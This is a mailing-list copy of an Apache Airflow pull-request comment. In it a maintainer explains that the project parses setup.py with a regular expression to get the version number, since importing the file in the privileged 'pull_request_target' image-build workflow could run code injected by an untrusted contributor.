potiuk commented on pull request #20338: URL: https://github.com/apache/airflow/pull/20338#issuecomment-997374726
> Is this the right way to find version or is there any better way than this? Yeah. This is the right one. There are few things that are important: 1) We will always have one and only one version in setup.py. And we want to have exactly one "source of truth" for version number, so we chose to use `setup.py` as the source of truth. 2) Since we are using python, we potentially coudl do it differently - we could simply import version from setup.py, but we do not want to do it deliberately. I will capture it in the ADR shortly, to document where it comes from, but whenever we build an image we should not execute any code that comes from the PR (because of the security). This is extremely important, because w run "building images" in a special workflow "pull_request_target" that has more permissions than the regular "PR workflow". The "setup.py" file might be changed in a PR, so if we import it (i.e. effectively execute python top-level code) we could get some anonymous user inject a code that has more permissions (and for example could make commites to our repository). That's why parsing the file with regular expression and getting version this way is a better option. I will capture that as an ADR shortly and explain in more detail. -- This is an automated message from the Apache Git Service. To respond to the message, please log on to GitHub and use the URL above to go to the specific comment. To unsubscribe, e-mail: [email protected] For queries about this service, please contact Infrastructure at: [email protected]
